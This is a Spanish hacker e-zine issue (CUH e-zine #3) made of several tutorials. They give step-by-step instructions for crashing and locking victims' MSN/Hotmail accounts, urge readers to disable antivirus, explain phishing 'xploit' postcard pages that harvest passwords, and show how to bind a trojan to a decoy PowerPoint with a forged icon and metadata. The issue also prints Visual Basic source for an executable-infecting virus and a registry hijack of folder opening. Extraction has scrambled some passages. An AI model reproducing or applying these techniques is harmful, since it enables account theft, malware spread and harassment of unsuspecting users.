    Utilidades MSN CUH e-zine 3 Edicion Antes de todo yo les aviso que no estoy de acuerdo con este tipo de actividades. Muchos han escuchado del famoso programa congelador de MSN o tumba MSN ahora har un manual donde explicare su uso desde 0. Empecemos por saber para que sirve, el programa lo que hace es mandar una cantidad muy grande de iconos gestuales de MSN hasta que el uso de cpu llegue al 99% al llegar a eso el PC de la victima se queda pegado /colgado (como lo quieran llamar). Bueno explicare paso a paso. Paso 1: Desactivar los iconos gestuales de el MSN (aprietan en su nick >opciones>mensajes>desactivar iconos gestuales) Importante: Es muy importante que hagas eso , si no a ti tambin se te quedara pegada la PC , tambin aviso que en el momento de tumbar el MSN de tu victima tu PC se quedara pegado por aproximadamente unos 40 segundos. Paso 2: Abre solamente la ventana de tu victima y abre el congelador de msn

    Y al apretar tumbar MSN, tu PC se quedar pegada 40 seg., despus vers que tu victima se desconecto, y entrara de nuevo a msn, y se lo haces de nuevo hasta que piense que es un virus xD. Nota: Normalmente los antivirus lo detectan como un Virus. Por qu? Se dice que es por que Microsoft le pago a las casas de Antivirus, ya que nadie ha dado con la solucin para esto, piensa que si cada ves que te metes al MSN tienes que reiniciar el PC. Pero les aseguro que no es un virus solo desactiven su Antivirus y listo, yo lo use y no me paso nada si no lo uso ahora es por que no me parece adecuado. LINK DESCARGA DEL PROGRAMA: http://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.html Bloquear MSN. Que es un bloqueador de MSN? Un bloqueador de MSN lo que hace es que tu victima no pueda ingresar a su correo ni a su MSN mientras tengas el programa encendido con solo la necesidad de tener su cuenta, sin necesidad de el password.

    Como lo hace?: Este programa se basa en que Hotmail tiene un bloqueo, si uno intenta iniciar sesin muchas veces tu cuenta queda bloqueada de 1 a 5 horas, si tienes el programa encendido lo intentara siempre y hasta que no lo apagues el/ella no podr entrar. NOTA: Si bloqueaste a alguien y despus de 1 hora entro de nuevo solo cierra el programa y intntalo de nuevo. Solamente se puede aplicar si la persona esta desconectada (si esta conectada solo usa el congelador de mas arriba y en el momento que no este usas el bloqueador y el no podr ingresar mas o por ing. social dile que se salga 10 segundos) Explicare paso a paso el uso del programa. Paso 1: Descargamos el programa de: http://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_es Paso 2: Lo abrimos y ponemos el mail de tu victima (No puede estar conectada)

    Listo, hasta que no lo saques no tendr ni

    MSN ni Hotmail, si lo usas seguido a la misma persona seguramente se terminara por crear otra cuenta, espero que no les haga problema desconectar a alguien de MSN. Nota: Sus AV tambin lo detectaran como virus, pero no les pasara nada se los aseguro.

    Hackeo de MSN, las maneras menos complicadas para newbies Esto esta echo especialmente para un newbie, y se basa en hackear a personas con poca experiencia en esto, como la mayora de la gente que usa el computador para escuchar musica, navegar, chatear, y usar el office. Empecemos por lo menos complicado que todos pueden hacer, los llamados correos fake, generalmente se basan en postales, las cuales uno le enva un correo a alguien en el cual para ver la postal hay que logearse a msn, las opciones de los mejores correos fake o lanzadores de exploits son: - Tu email (al cual te llegan las contraseas) -Email falso con el cual le llegar el correo (ideal para poner a alguien conocido de tu victima) - Nombre falso. (Con el cual le llegara el correo)

  • Hacking Newbie

    Utilidades MSN CUH e-zine 3 Edicion -Mail verdadero de tu victima. - Mensaje personal que estar en la postal. - Tipo de postal (gusanito, tarjetas bubba, tarjetas NIKO, invitaciones MSN Spaces) -Tipo de correo (Yahoo, Hotmail, Gmail) Listo. Tutorial grafico Entramos a nuestra pgina de postales, y ponemos las opciones,

    Despus si todo salio bien nos saldr esto, (dependiendo se su Pg. de lanzadores)

    Son muy fciles de usar, en el momento de que la victima quiera leer la postal simplemente la redireccionar a una pgina similar a la de inicio de Hotmail en la cual el/ella ingresar sus datos y despus llegaran a tu bandeja de entrada, (dependiendo de la pgina de donde lo mandaste.) Donde encuentro lanzadores de exploits? (Web donde ingreso los datos mencionados arriba y manda la postal) www.google.com , www.cascanolahack.net, www.colombiahack.com etc. Ac tienen una contrasea que me llego, a mi bandeja de entrada de mi correo

    Gracias a cascanolahack, por su Pg. de

    lanzadores. Otros mtodos El famoso keylogger se basa en un programa el cual a travs de conexin cliente/servidor graba todo lo que una persona escribe en su teclado y dependiendo del keylogger graba todas las pginas Web ingresadas y deja tomar capturas de pantalla cada cierto tiempo. Ms informacin en: Troyanos: http://foro.el-hacker.com/index.php/topic,85484.0.html Exploits: http://foro.el-hacker.com/index.php/board,85.0.html Con mucha imaginacin y con ing. social se puede conseguir un pass solo es cosa de tiempo. Trucos msn posteado por Chavero Cheva: http://foro.el-hacker.com/index.php/topic,14287.0.html Bueno le doy las gracias a foro.el-hacker.com y todos los usuarios y todo el excelente equipo de moderadores del foro, ya que gracias a esa comunidad aprend casi todo lo que se y me enseo a ver muchas cosas de forma diferente. Tambin repito que por opinin personal no estoy de acuerdo con algunas cosas mencionadas aqu, pero al ver en las Pg. que lo ms descargado es esto y que muchos entran a este mundo con intenciones como estas les dejo esto para que aprendan bien.

    Cualquier duda o comentario [email protected] (solo recibo mails) Saludos RA19

  • Troyanos y virus

    de troyanos CUH e-zine 3 Edicion Creacion

    Crear y Encriptar Troyanos By Angelus_7722

    CREAR Y ENCRIPTAR NUESTRO SERVER

    Una de las preguntas mas comunes al momento de crear y encriptar nuestro server, es como podemos

    engaar a nuestra victima para que no sospeche al momento de abrir nuestro server. Antes que todo, debemos tener en cuenta que el arte que envuelve a la ingeniera social es muy importante al momento de tratar de conseguir nuestro cometido, pero no entrar en detalle ya que este tema se ha tocado en anteriores e-zines. Lo que haremos es maquillar nuestro server para que no sea tan sospechoso y para ello necesitaremos de las siguientes herramientas: Server encriptado Presentacin Power Point (.pps) PowerPoint Slide Show Convert Iexpress MiTeC IconFactory Resoucer Hacker eXeScope

    Utilic una presentacin de Power Point como archivo seuelo ya que a todo el mundo le encanta ver este tipo de archivos, por esta razn es recomendable no usar archivos de imgenes debido a que en el explorador de windows, el msn y correos electrnicos, pueden pre visualizar imgenes, generando de esta manera sospechas, debido a que el archivo que estamos enviando es de extensin .exe Bueno, lo primero que vamos a hacer es convertir nuestro archivo lo_mejor.pps en lo_mejor.exe, con el fin de poder utilizar el Iexpress como binder. Como todos saben, el Iexpress es una herramienta propia de Windows que podemos utilizar para unir o juntar dos archivos de extensiones .exe en uno solo tambin de extensin .exe, convirtindose de esta manera en el binder perfecto, indetectable a los anti virus. Para ello utilizamos un programa llamado PowerPoint Slide Show Converter, aunque existen muchos mas que nos sirve para realizar este tipo de conversin. Abrimos Power Point Slide Show Converter:

    Luego veremos el menu principal

    Seleccionamos Simple Mode y veremos lo siguiente

    Ahora solo debemos presionar el botn Make Slide Show para que realice la conversin. Una vez finalizada la conversin presionamos el botn aceptar.

    Al final veras el resultado de tu presentacin de Power Point, en un archivo aplicativo.

  • Troyanos y virus

    de troyanos CUH e-zine 3 Edicion Creacion

    Bueno, lo siguiente que haremos es bindear el server encriptado (troyano) con lo_mejor.exe (seuelo).

    No entro en detalle sobre la confifuracin ya que la info la puedes encontrar en foro.el-hacker.com. El resultado del bindeo es un archivo aplicativo o ejecutable como el siguiente:

    Lo siguiente que haremos es buscar el Icono de power point, el cual podremos extraer con un programa muy bueno llamado MiTeC IconFactory

    Lo siguiente que haremos es abrir el programa y seleccionar open desde File ubicado en el men principal.

    Acontinuacion ubicaremos la carpeta de Microsoft office para ubicar el icono de Power Point

    Le damos doble clic a POWERPNT.EXE y veremos todos los iconos que maneja dicho programa. En este punto debemos seleccionar el icono que deseamos y el de mayor tamao.

    Lo que haremos ahora es guardar el icono para ser utilizado mas adelante.

    El resultado es un archivo con extensin .ico

    El siguiente paso es cambiar el icono de nuestro server, ya que el que tiene actualmente corresponde al asignado por el IExpress. Para poder hacer el cambio utilizamos programa conocidos por todos que es el Resoucer Hacker.

  • Troyanos y virus

    Creacion de troyanos CUH e-zine 3 Edicion

    Lo que haremos es seleccionar el archivo al que queremos cambiarle el icono, siendo en nuestro caso el server que ya bindeamos y que denominamos como Archivo_IExpress.exe.

    Una ves seleccionado el archivo procedemos eliminar la carpeta AVI como lo muestra en la figura.

    El siguiente paso consiste en cambiar el icono, asi que debes seleccionar la opcin Replace Resource

    Ahora lo que debemos hacer es cambiar el icono actual por el icono de Power Point, para ello

    oprimimos el botn Open File with new Icon.. y ubicamos el archivo POWERPNT_4.ico

    Despus solo debemos oprimir Replace

    Como vern los iconos ya fueron cambiados y solo queda guardar los cambio con la opcin save as y elegimos guardar sobre el ya existente es decir en Archivo_IExpress.exe.

    Como se darn cuenta, saldr un mensaje preguntando si desean remplazar el archivo, al cual debern darle yes. Al final y despus de refrescar la ventana donde se encuntra nuestro server, veremos que su icono a cambiado.

  • Troyanos y virus

    Creacion de troyanos CUH e-zine 3 Edicion

    Si detallan el archivo podrn ver datos como Win32 Cabnet Selft-Extractor y Microsoft Corporation, informacin que levantara sospechas. Para dar solucin a este inconveniente usaremos un programa llamado eXeScope

    Lo siguiente que haremos es dar en la X para cerrar el programa, pero antes de que se cierra nos pide confirmar el cambio del tamao del archivo al cual le daremos aceptar

    Lo que debemos hacer es abrir nuestro server con este programa.

    Al final obtendremos un archivo mas creble al que debemos cambiarle el nombre por el original de la presentacin de Power Point, lo_mejor.

    Ahora lo que haremos es modificar algunos datos para mejorar su aspecto, FileDescription y CompanyName. Lo primero es dar un clic al botn derecho sobre FileDescription, seleccionamos editar y escribimos lo que queramos, por ejemplo Microsoft Office, lo mismo hacemos con CompanyName, al cual lo cambiaremos por Power Point.

    Aclaro que lo mas importante es la Ingeniera Social que usemos con nuestras victimas, aunque un poco de ayuda no est mal.

    Saludos

    Angelus_7722

    Despus de modificarlo veremos algo como

  • Exploits

    Conocimiento Basico De Exploits CUH e-zine 3 Edicion

    Conocimiento Basico De Los Exploits By SkullMaster123

    CONOCIMIENTOS BSICOS DE

    LOS EXPLOITS, VULNERABILIDADES, ETC...

    Saludos, bueno aqu les voy a

    explicar conceptos bsicos de los exploits y otras cosas, ya que he visto que muchos users postean esto lo otro, pues aqu les dejo ciertas cosas bsicas! Bueno comencemos: Qu es un exploit? Los exploits son unas de las muchas maneras de explotar alguna vulnerabilidad en un sistema, cuya seguridad puede ser saltada por este. Al hablar de querer explotar un bug tienes que estar programado dicho exploit en el lenguaje correspondiente y sin ningn error en sus lneas, existen formas diferentes de ejecutarlo ya sea local o remota. Exploit tambin viene de la palabra ingles, que significa explotar, este en realidad es un cdigo malicioso. Qu es una Vulnerabilidad? una vulnerabilidad es una debilidad en los procedimientos de seguridad, diseo, implementacin o control interno que podra ser explotada (accidental o intencionalmente) y que resulta en una brecha de seguridad o una violacin de la poltica de seguridad de sistemas Explotar Forma Local: Este caso nuestro exploit esta en nuestra maquina, a eso se refiere el nombre, Un ejemplo bien visto sobre esta forma de explotar es la shell. Explotar Remotamente: En este caso es lo contrario estaramos atacando a algn servidor que tenga red, esto se realiza a travs de puerto, sean privilegiados o no. Puertos Privilegios: Esto son menores que 1024, estos estn reservados al S.O Puertos no privilegios: Estos son mayores que 1024.

    Tipos de exploits: Aqu nombrare algunos exploits (Los que me acuerdoXD) su nombre y definicin, algunos tambin, solo son vulnerabilidades o bugs: Desbordamiento del Buffer: es un error de software que se produce cuando se copia una cantidad de datos sobre un rea que no es lo suficientemente grande para contenerlos, sobrescribiendo de esta manera otras zonas de memoria. Como consecuencia, se producir una excepcin del acceso a memoria seguido de la terminacin del programa o, si se trata de un usuario obrando con malas intenciones, la explotacin de una vulnerabilidad o agujero de seguridad. Describiendo la tcnica: Un desbordamiento de buffer ocurre cuando los datos que se escriben en un buffer corrompen aquellos datos en direcciones de memoria adyacentes a los destinados para el buffer, debido a una falta de validacin de los datos de entrada Cross-site scripting o XSS: Esta es muy conocida, jeje y algunas personas la aprovechan, esto ocurre cuando hay una vulnerabilidad en el HTML o en la validacin de este. Originalmente abarcaba cualquier ataque que permitiera ejecutar cdigo de "scripting", como VBScript o javascript, en el contexto de otro dominio. Inyeccin SQL: Tambin es muy conocida y muy usada esta vulnerabilidad, esta ocurre en el nivel de la validacin de las entradas a la base de datos de una aplicacin. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con cdigo SQL. Es, de hecho, un error de una clase ms general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programacin o de script que est incrustado dentro de otro.(En este caso no seria un exploit sino una vulnerabilidad) Ataque DoS: Es un ataque a un sistema de ordenadores o red que causa que un servicio o recurso sea inaccesible a los

  • Exploits

    Conocimiento Basico De Exploits CUH e-zine 3 Edicion usuarios legtimos. Normalmente provoca la prdida de la conectividad de la red por el consumo del ancho de banda de la red de la vctima o sobrecarga de los recursos computacionales del sistema de la vctima.

    Se genera mediante la saturacin de los puertos con flujo de informacin, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios, por eso se le dice "denegacin".

    ROOT Exploit:

    Un rootkit es un utilidad que, archivos en formato exe o bien ejecutables (como quiera llamarse) han sido previamente troyanizados por alguna persona que los program, con el fin de que sta persona pueda permanecer indetectable al momento de permanecer en un sistema que va a comprometer. Esto es muy utilizado por aquellas personas que no cuenta con el conocimiento necesario para poder programar sus propias herramientas para que los mantengan ocultos. Algunos de estos rootkits pueden llegar a modificar el Kernel, llmese en Windows y Linux.

    Link ROOT Exploit: http://rapidshare.com/files/40261958/rootexploits.rar.html

    Escner de vulnerabilidades:

    Bueno este es un programa que muchas personas que exploten bugs etc deberan tener este escanea algn sitio Web y luego te da un informe de las vulnerabilidades que tienes (Si es que tiene claro) y luego de vez en cuando te da un link de ese exploit! Uno de esos programas es: Shadow Security Scanner (O SSS)

    - No basta Solo con Escanear una Pagina Web con Shadow Security Scanner, Acunetix, u Otro, estos software son de auditoria, dejan un Log, Tremendo en la maquina remota, los administradores de estos servidores, si sabrn quien escaneo, aunque utilices Proxy.

    Que es un Proxy? el trmino Proxy hace referencia a un programa o dispositivo que realiza una accin en representacin de otro, en pocas palabras esto oculta tu IP. Qu es un Xploit? Esto NO es lo mismo que Exploit, un Xploit es un fake mail, Enviar correo electrnico falseando el

    remitente. Se trata de una tcnica muy empleada en Ingeniera Social. Para poder obtener contraseas de Hotmail, yahoo o cualquier tipo de compaa para los correos electrnicos. Al Enviar un mail y la victima hacer click este se ridereccionaba automticamente al XPLOIT, el cual era una mascara , el Xploit le Peda los datos, exactamente igual como si fuese el Index de Hotmail, Pero una vez Puesto, estas contraseas van al Email del Atacante, luego de ingresar, les sala un error, y tenan que volver a colocar la contrasea pero esta vez, si era el Index de Hotmail, e ingresaban a sus Correos Normalmente. Una gran diferencia que se ha de tomar en cuenta! Dnde encuentro Exploits? Bueno hay muchas pginas donde descargarlos aqu dejo algunas: http://www.milw0rm.com/ http://www.securityfocus.com/ http://www.blacksheepnetworks.com/security/hack/ Bueno milworm es buena, pero primero para usar exploits tienes que leer muchos, tambin seria buen que supieras lenguaje de programacin en este caso C, ya que es uno de los mas utilizados para los Exploits, y bueno leer, leer, leer Otra cosa nunca ejecutes un exploit si no sabes lo que hace! Bueno creo que este corto manual menciono ciertas cosas importantes, hasta donde me acuerdo! Espero que lo hallan disfrutado y entendido que es muy importante, bueno un saludo a toda la C.U.H, y si me falto algo disculpen!! Y mis mas sinceras disculpas! ;)

    By-SkullMaster123

  • Programacion VB

    Infectar Ficheros Ejecutables CUH e-zine 3 Edicion

    Infectar Ficheros Ejecutables En Windows By ANYD00M

    INFECTAR FICHEROS EJECUTABLES

    Antes que nada me presento, soy ANYD00M y les dejo un artculo sobre como infectar ficheros ejecutables de Windows utilizando el lenguaje Visual Basic 6.0. El

    siguiente artculo no fue creado con fines de inclusin a algn virus aunque as se exponga, y debe ser utilizado solo con fines educativos y de aprendizaje propio a tu persona. Por ende debes hacerte responsable de tus acciones a la hora de utilizar el contenido, no nos comprometa ;-)

    Lo que haremos ser crear una rutina para infectar archivos ejecutables (*.exe) de un sistema utilizando Visual Basic 6.0. El mtodo que usaremos ser el prepending que se basa en introducir los bits del virus sobre los bits del ejecutable original y luego introducirle una marca para saber si esta infectado o no, normalmente al ejecutable a infectar se lo denomina host y as lo llamaremos nosotros tambin. Seguramente ya abran odo hablar del prepending y abran visto su esquema =P. Mirando el esquema se darn una idea mas fluida de lo que estamos hablando, veamos los esquemas que nos indicaran las 3 secuencias por las que pasa el ejecutable al ser infectado. 1er esquema, el fichero ejecutable en su estado original:

    --------------------------- | HOST | ---------------------------

    2do esquema, al fichero se le agregan los bits del virus:

    --------------------------- | VIRUS | --------------------------- | HOST | ---------------------------

    3er esquema, se agrega una marca de infectado:

    --------------------------- | VIRUS |

    --------------------------- | HOST | --------------------------- | MARCA | ---------------------------

    Bueno, quedo un poco feo, pero da una idea de lo que estamos hablando. Lo terico es solo esto, y esto es lo nico que tienen que saber, ahora comencemos a programar. Primero lo primero Para comenzar debemos realizar los principios bsicos, y comenzamos programando en el Form_Load. Para infectar debemos utilizar una copia del virus que no se este ejecutando en memoria, sino al intentar abrirlo el VB nos dar error. El cdigo estar comentado para no tener que cortarlo con explicaciones: Private Sub Form_Load () 'Declaramos las variables que usaremos. Dim Vx As String, PE As String 'Si nos estbamos ejecutando _ terminamos la aplicacin If App.PrevInstance Then End 'Establecemos a Vx como la ruta completa _ del virus. Vx = App.Path & "\" & App.EXEName & ".exe" Copiamos el virus y reestablecemos el _ valor de la variable. FileCopy Vx, C:\VIRUS.exe Vx = C:\VIRUS.exe 'Establecemos a Pe como la ruta completa _ del ejecutable a infectar. Pe = "C:\HOST.exe" 'Ya tenemos lo que necesitamos, ahora _ solo debemos llamar a la Funcion que _ infectara el archivo, pasndole como _ parmetros la ruta del virus y la del _ archivo a infectar (Pe o C:\HOST.exe) Call InfectarFichero(Vx, Pe) End Sub Bien, ahora debemos crear la funcin que infectara el fichero (en este caso HOST.exe ubicado en la raz C:\). A la Funcin le pasaremos dos parmetros, el primero ser la ruta completa del virus y el segundo

  • Programacion VB

    Infectar Ficheros Ejecutables CUH e-zine 3 Edicion ser la ruta completa del fichero a infectar. Lo que har esta funcin ser abrir de forma binaria el virus, obtener sus bits y bytes, luego abrir el fichero a infectar y agregarle los bits al principio y la marca al final. Eso fue fcil no?, ahora comencemos con la funcin principal: Private Function InfectarFichero(Virus As String, Host As String) 'Declaramos variable/s Dim Marca As String, BtsHost As String 'Establecemos la marca Marca = "HOSTInfectado" 'Abrimos el fichero para saber si esta infectado Open Host For Binary Access Read As #1 'Obtenemos el tamao en bytes _ del fichero BtsHost = Space(LOF(1)) 'Obtenemos todo su contenido. Get #1, , BtsHost 'Cerramos el archivo Close #1 'Miramos si el archivo ya esta infectado If InStr(BtsHost, Marca) 0 Then 'Si esta infectado salimos. Exit Function Else 'Sino lo infectamos... 'Establecemos la variable aqu _ ya que si la ponamos al inicio _ y no la usbamos, gastbamos _ espacio en memoria de gusto. Dim BtsVirus 'Abrimos de forma binaria el virus Open Virus For Binary Access Read As #2 'Obtenemos el tamao (en bytes) usando _ la funcin Len(Archivo) BtsVirus = Space(Len(Virus)) 'Obtenemos los bits... Get #2, , BstVirus 'Cerramos el archivo Close #2 'Abrimos el fichero para infectarlo Open Host For Binary Access Write As #3 'Ponemos los bits del virus Put #3, , BtsVirus 'Ponemos los bits del original Put #3, , BtsHost 'Ponemos la marca Put #3, , Marca 'cerramos Close #3 End If End Function

    Muy bien, con esto ya tenemos infectado el fichero. Pero Que pasa si queremos que cuando el usuario ejecute el fichero infectado, para no levantar sospechas se ejecute tambin el ejecutable original?. Para esto deberamos crear otra funcin que cree un archivo temporal con los bits del fichero original, lo ejecute y lo elimine. As quedara en memoria el virus y el fichero infectado. Bueno, comencemos: Function DesinfectarFichero(Pe As String) Dim Host As String 'Copiamos para poder abrirlo de forma _ binaria. FileCopy Pe, "C:\Temporal.exe" 'Abrimos y extraemos los bits correspondientes _ al Host. Open "C:\Temporal.exe" For Binary Access Read As #1 'Obtenemos los bits del host, pero ATENCION _ para esto debemos saber los bits que tenia _ nuestro virus al ser compilado, esto lo _ pueden obtener en las propiedades ;) Host = Space(Len("C:\Temporal.exe") - 20382) 'Obtenemos a Host. Get #1, , Host 'Cerramos Close #1 'Ahora creamos otro fichero temporal para poner _ el Host, no es necesario que exista anteriormente _ ya que VB lo crea si no existe. Open "C:\HostTemporal.exe" For Binary Access Write As #2 'Ponemos los bits del host Put #2, , Host 'Cerramos Close #2 'Ejecutamos el Fichero Shell "C:\HostTemporal.exe" 'Eliminamos los archivos temporales: Kill "C:\Temporal.exe" Kill "C:\HostTemporal.exe"

  • Programacion VB

    Infectar Ficheros Ejecutables CUH e-zine 3 Edicion End Function

    con esto ya habremos terminado, espero les halla

    OTAS:

    Yservido. NPero a pesar de que tengamos ahora esta valiosa

    funcin, nos hace falta modificar un poco el Form_Load, para saber ni bien se ejecute el virus si se encuentra alojado en un fichero infectado o si es ejecutado desde su propio ser =P.

    tener el tamao en bytes del virus, una vez

    a infeccin de ejecutables en un virus supone un

    -Para obque lo hallan compilado se dirigen a l y le hacen clic derecho, van a propiedades y ah les dir el tamao. As que, vamos a agregar unas lneas al Form_Load: -L motor de bsqueda de archivos que realice esta accin por todo el disco, esto lo podrn encontrar fcilmente en Internet pero yo no lo eh puesto ya que es muy largo.

    Private Sub Form_Load() 'Declaramos las variables que usaremos. Dim Vx As String, Pe As String 'Si nos estbamos ejecutando _ terminamos la aplicacin If App.PrevInstance Then End 'Establecemos a Vx como la ruta completa _ del virus. Vx = App.Path & "\" & App.EXEName & ".exe" '*Lneas agregadas* 'Verificamos si el tamao del virus es _ el correcto o pesa mas. De pesar mas _ suponemos que se encuentra en un fichero _ infectado, as que llamamos a la funcin _ que "desinfecta" If Len(Vx) > 20382 Then Call DesinfectarFichero(Vx)

    Les envo un cordial saludo a todos los lectores de la

    Atte. ANYD00M

    rticulo escrito formalmente para la CUH E-Zine #3

    End If 'Establecemos a Pe como la ruta completa _

    CUH e-zine y espero nos sigan apoyando como lo han hecho.

    del ejecutable a infectar. Pe = "C:\HOST.exe"

    'Ya tenemos lo que necesitamos, ahora _ [A solo debemos llamar a la funcin que _ de la comunidad El-Hacker.com]

    infectara el archivo, pasndole como _ parmetros la ruta del virus y la del _

    archivo a infectar (Pe o "C:\HOST.exe" Call InfectarFichero(Vx, Pe)

    End Sub

  • Programacin

    Interceptar apertura carpetas CUH e-zine 3 Edicion

    INTERCEPTAR LA APERTURA DE CARPETAS By ANYD00M

    INTERCEPTAR LA APERTURA DE CARPETAS

    Lo que veremos a continuacin es una manera de interceptar la apertura de una carpeta (cualquier carpeta). El articulo que sigue se aplicara al

    lenguaje Visual Basic 5.0 o 6.0 y trata sobre como modificar el registro..

    Esta tcnica es muy simple y no tiene mucho que explicar, as que vemoslo: Cuando se abre una carpeta, al igual que al intentar abrir un fichero, se producen una serie de operaciones que lleva a cabo Windows sobre el registro para saber con que debe mostrar el contenido de dicha carpeta. Esta tcnica se ah visto aplicada a virus, que, como ya saben, las carpetas no se pueden infectar en si, sino su contenido, y esto es lo mas cercano a infectar una carpeta (abrir la misma y que se abra el virus tambin). Lo que veremos nosotros no ser como aplicarla a un virus, ya que no me interesara ensearles eso, sino aplicrselo a una simple aplicacin que nos puede servir como seguridad para nuestras carpetas. Como lo haremos? Pues no creare una aplicacin de seguridad para carpetas, pero seguramente entenders como se puede hacer despus de leer esto. Cuando hacemos doble clic sobre un icono de carpeta, estamos enviando un comando a Windows y este comenzara a analizarlo. Pues bien, Windows reconoce que a lo que se le hizo doble clic era a una carpeta, as que Qu clave de registro tiene que leer para saber como y con que abrirlo? Dicha clave como ya se deben haber imaginado esta en HKEY_CLASSES_ROOT y es Directory (Completa: HKEY_CLASSES_ROOT\Directory). Esta clave contiene otra clave llamada Shell y esta clave tiene

    un valor, que por defecto ser none (o estar vaci en algunos casos, creo..). Dicho valor (none) es la accin que va a cumplir Windows, y la buscara en las claves que se encuentren dentro de Directory. Si no encuentra dicha accin (none no la va a encontrar por defecto) abrir la carpeta con el archivo Explorer.exe ubicado en el directorio de Windows (%SystemRoot%). Lo que haremos nosotros ser cambiar esa accin, none, por una nuestra. Luego agregar esa accin a la clave Directory y cuando Windows encuentre la clave de la accin lo que pedir ser la aplicacin con que hay que abrir la carpeta, y pues esta ser nuestra aplicacin. Veamos esta pequea imagen hecha rudimentalmente en el Paint xD

    Como vern, la clave final que debemos modificar es: HKEY_CLASSES_ROOT\Directory\Shell y debemos cambiar su valor por defecto por una accin inventada por nosotros, por ej. PROTECTO Luego debemos aadir esa accin, para ello debemos crear una clave dentro de Shell con el nombre PROTECTO y en su valor por defecto poner nuestra aplicacin..

  • Programacin

    Interceptar apertura carpetas CUH e-zine 3 Edicion

    Esto seria as: Private Sub CrearAccion() Dim Wss as object, Yo as string Yo = App.Path & \ & App.EXEName & .exe Set Wss = CreateObject(Scripting.FileSystemObject) Aplicamos la accin: Wss.RegWrite HKEY_CLASSES_ROOT\Directory\Shell\, PROTECTO Creamos la accion: Wss.RegWrite HKEY_CLASSES_ROOT\Directory\Shell\PROTECTO\, Yo & %1 End Sub Con esto ya correramos nuestra aplicacion cada vez que se intente abrir una carpeta. Pero no se estara abriendo la carpeta, as que la idea seria que en el Form_Load agreguen unas lneas, que verifiquen si nuestra aplicacin esta recibiendo comandos (se hace con el objeto Command$) y si esos comandos corresponden a una carpeta (lo hacemos con GetAttr). Pero antes debemos arreglar una cosita del cdigo anterior, lo que debemos hacer es agregar despus de nuestra aplicacin en la clave PROTECTO esto: %1 (sin Comillas) eso corresponde a la carpeta que se quiere abrir, para Windows %1 es una variable ;-)

    As que antes de empezar con el Form_Load, arreglemos esa lnea, que nos queda as: Wss.RegWrite HKEY_CLASSES_ROOT\Directory\Shell\PROTECTO\, Yo & %1 Y no olviden poner el espacio antes del %1 ya que sino lo hacemos, no lo enva como comando... Ahora si, pasemos al Form_Load: Private Sub Form_Load() Verificamos si recibimos comandos If Command$ then Si es as, miramos si es una carpeta If GetAttr Command$ = VbDirectory Then Si es una carpeta, la abrimos con el Explorer.exe Shell %SystemRoot% & \Explorer.exe & Command$ End if End if End Sub Y listo! Ahora si, con eso nos ejecutamos cuando se abre una carpeta y abrimos dicha carpeta. Si quieres hacer una especie de aplicacin para proteger carpetas y todava no se te prendi la lamparita, te dar una idea (pero no har cdigo ;-)) Con el objeto Command$ recibimos la ruta de la carpeta que se esta queriendo abrir, as que, previamente tendremos supnganse un archivo, que contendr todas las carpetas que se desea proteger. As que al recibir los comandos, los comparamos, si es igual a alguno de los que esta en el archivo, pedimos contrasea para abrirlo, si la contrasea es valida la abrimos, sino no la abrimos. Eso es una pequea idea que les podr ayudar. Me despido, les envo un cordial saludo.

    ANYD00M

  • Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion

    INTRODUCCION AL ASM II By The Shadow

    INTRODUCCION AL ASM II

    ORIENTANDONOS AL CRACKING y VirII CoDiNg

    Uno de los principales usos que

    se le puede dar a tener un poco de conocimiento del ensamblador, es no estar perdido en tus primeras aproximaciones en el cracking.

    En este segundo tuto intentare darles una orientacin bsica a lo que es el assembler que usan los crackers para crackear (XD), sin alejarnos del objetivo artstico de aprender a programar en assembler con aplicacin a la creacin de virus. PD: Algunos puntos de inters para el cracking, como lo son los registros, los obviar en este tuto ya que en la primera parte los expuse.

    Algo que tenemos q recordar es el registro IP. Cuando me refiera a IP, quiero decir Puntero de Instruccin, el cual recordaremos que es donde se ubica la instruccin que se esta ejecutando en un programa. 0- Instruccin LEA

    LEA ~ Load Effective Adress ~ Cargar direccin efectiva Bsicamente realiza la funcion de mov, calcula el offset del operando origen, y lo almacena en el destino Sintaxis: lea (reg/pos),(reg/pos) Ejemplo: lea ax,dx

    1- Instrucciones INC y DEC: Estas instrucciones son sumamente simples, pero tengo q explikrlas ya q las usaremos despus. Weno imagnense que es como set a=%a%+1 en batch o a++ en C. INC ~ Increment ~ Incrementa: como su nombre lo dice, aumenta en uno el valor de un registro o de una posicin de memoria. DEC ~ Decrement ~ Decrementa: como su nombre lo dice, disminuye en uno el valor de un registro o de una posicin de memoria. Ejemplos: INC DX ;Incrementa DX en uno DEC DWORD PTR [DI+102] ;Decrementa en uno el valor del DWORD ubikdo en [DI+102] del segmento actual 2- Instrucciones de comparacin CMP y TEST: Los valores que contienen las flags que utilizan los saltos, los determinan otros comandos, estos son los "comparadores", de estos podemos mencionar los mnemonicos "cmp" y "test", de los cuales estudiaremos el "cmp". -Sintaxis del "cmp": cmp v1,v2 --donde "v1" corresponde a: un valor hex, un registro o una posicin de memoria. Al igual que "v1", "v2" tambin representa un valor. As, "cmp v1,v2", tomara "v1" como valor de destino y "v2" como valor fuente, luego resta el valor fuente menos el valor de destino y actualiza las flags con el resultado. CMP equivale a un SUB lgico, solo q no guarda sus resultados en los registros, pero si actualiza las flags TEST ~ Comprobar: Equivale a hacer un AND lgico, solo q no modifica registros, solo actualiza las flags. 3- Manejando saltos condicionales: En lenguajes de alto nivel, como el basic, se tienen comandos o sentencias que permiten tener un control sobre las sentencias que se ejecutan en un

  • Hacking Newbie

